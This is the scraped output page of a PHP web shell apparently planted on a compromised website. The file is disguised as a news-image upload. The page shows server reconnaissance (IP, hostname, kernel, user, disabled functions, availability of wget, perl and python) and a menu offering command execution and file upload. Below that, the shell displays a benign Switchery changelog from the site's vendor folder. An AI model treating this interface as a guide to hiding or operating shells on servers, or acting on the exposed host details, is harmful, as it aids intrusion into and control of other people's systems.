|
Server IP : 124.109.2.77 / Your IP : 216.73.216.49 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/vendors/raphael/../switchery/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
0.8.1 / 2015-06-26 ================== * Check disabled values properly, because of `.isDisabled()` method returning improper value 0.8.0 / 2015-04-03 ================== * Secondary jack color functionality * Enable/disable switch dynamically * Destroy event handlers attached to a Switchery instance * Meteor.js integration 0.7.0 / 2014-12-09 ================== * Respect `readonly` attribute on checkbox input * Large and small size switches 0.6.3 / 2014-11-02 ================== * Update component version * Added separate Jack color option * Add the CSS file to bower.json * Fix bug in Hongmi phone * Fixing issue found in IE9+ with change event dispatch 0.6.2 / 2014-08-22 ================== * Prevent text selection on double click 0.6.1 / 2014-07-11 ================== * Fix switch click state when inside label 0.6.0 / 2014-05-22 ================== * Corresponding label with `for` attribute of the native input, to change switch state as well * Do not copy input's `id` and `name` attributes to switch 0.5.5 / 2014-05-14 ================== * Set secondary color to be background color on switch off state 0.5.4 / 2014-04-29 ================== * Fix box-sizing when using Bootstrap 3 0.5.3 / 2014-04-12 ================== * Detect native checkbox state change 0.5.2 / 2014-04-03 ================== * Enable event bubbles 0.5.1 / 2014-03-22 ================== * Fix jack position when switch is hidden 0.5.0 / 2014-02-07 ================== * Removes the internal validation for loaded switches and lets people do it on their own * Sets a data attribute to handle multiple calls for a checkbox 0.4.2 / 2014-01-24 ================== * Resolve property method issues in IE * Disable label checkbox change event * Check if element is null 0.4.1 / 2014-01-18 ================== * Fix Event errors in IE8 0.4.0 / 2014-01-15 ================== * Use ftlabs/fastclick for mobile browser optimization 0.3.6 / 2014-01-04 ================== * Generate new standalone file * Refactor code * Use event constructors to create onchange and click events * Updated standalone to dist in bower.json * Required files * Add development info 0.3.5 / 2013-12-31 ================== * Proper checkbox value with onchange event 0.3.4 / 2013-12-31 ================== * Merge ni-c:master * Refactor onchange 0.3.3 / 2013-12-28 ================== * Merge pull request from tenbits:patch-1 * Leave first line empty * Undefined option's property * Update Readme * Update standalone * Changelog * Standalone -> dist, update Readme, add changelog 0.3.2 / 2013-12-27 ================== * Standalone -> dist, update Readme, add changelog * Merge pull request from vesln:min * Add minified versions * Minify CSS & JS * Fix the standalone build & improve Makefile * Ignore node_modules * Add package.json * Disabled opacity option * Disabled opacity option * Insert switch after target element * Require Transitionize